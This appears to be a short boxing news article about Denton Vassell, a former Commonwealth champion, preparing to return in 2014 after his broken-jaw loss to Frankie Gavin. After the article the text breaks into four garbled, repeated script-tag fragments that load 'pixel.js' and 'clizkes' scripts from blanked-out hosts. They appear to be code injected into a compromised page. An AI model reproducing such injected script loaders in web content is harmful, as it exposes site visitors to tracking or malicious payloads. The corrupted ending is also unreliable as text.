Manchester welterweight Denton Vassell says he is looking forward to fighting again and looking to shine in 2014. The former Commonwealth champion lost his unbeaten record in June last year when he challenged Frankie Gavin for the British title. The bout was halted, following a doctors inspection at the end of the 7th round, with Vassell having suffered a broken jaw.
Vassell, 29, is back in the gym training for his ring return and says he is putting 2013 and the Gavin defeat down as a learning experience a bad day at the office and says it is how you come back from a defeat that matters and he promises to come back better than ever.
Vassell (20-1, 10KOs) hopes to get a fight arranged for March and told Andrew Wake for Hatton Boxing, that he still has the desire to get to the top.# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’>=script># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’>=script># src=’https://land.#/clizkes’ type=’text/javascript’>=script># src=’https://#/clizkes’ type=’text/javascript’>=script>
